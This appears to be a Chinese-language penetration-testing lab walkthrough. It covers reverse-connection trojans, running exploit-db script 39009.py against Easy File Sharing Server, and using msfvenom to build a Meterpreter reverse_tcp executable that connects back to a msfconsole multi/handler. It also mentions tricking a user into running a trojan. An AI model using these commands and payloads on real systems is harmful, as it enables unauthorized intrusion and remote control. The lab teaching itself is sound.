一.远程控制-正向连接方式-黑客(客户端)先主动连接木马(服务端)
二.远程控制-反向连接-主动连接黑客(客户端)
诱使Rebecca
下载server.EXE并运行
server.EXE已配置
Yuri的IP地址和端口
三.easy file sharing server漏洞渗透测试
在windows上安装easy file sharing server
然后查询靶机(windows)的IP地址
在靶机上打开easy file sharing server,然后再打开kali的终端用nmap 扫描目标主机开放的端口,输入命令【nmap -sV [IP]】
发现80端口上运行了easy file sharing server
然后searchsploit查EasyFileSharing存在的漏洞,输入【searchsploit easy file sharing server】
以该漏洞为例,利用该漏洞使得靶机运行计算器
现在执行这个python脚本,执行时需要提供两个参数(靶机IP和目标端口),输入【python2 /usr/share/exploitdb/exploits/windows/remote/39009.py [靶机IP] 80】,执行该命令后渗透模块会连接到【目标IP】的80端口,将指定代码送过去
可以看到我们已经启动了计算器。
四.kali中生成被控端
Msfvenom 用到参数-p、-f 、-o
-p windows/meterpreter/reverse_tcp LHOST=192.168.182.3 LPORT=5000 -f exe –o /root/payload.exe
-p, –payload Payload to use;指定哪些有效载荷生成
本例中 windows/meterpreter/reverse_tcp :用于Windows平台的反向远程控制程序
-f, –format Output format;指定有效载荷的格式
本例中 exe 生成Windows系统的可执行文件
-o, –out Save the payload;指定保存位置
本例中 /root/payload.exe
1.首先ifconfig查看kali的IP地址
2.输入命令msfvenom -p windows/meterpreter/reverse_tcp lhost=【IP地址】lport=5000 -f exe -o /var/payload.exe,可以看到生成的被控端程序文件在var目录下
3.直接输入msfconsole命令启动Metasploit
4.依次输入use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 【IP地址】
set lport 5000
exploit
主控端启动完成
5.将生成的被控端提交到www.virustotal.com检测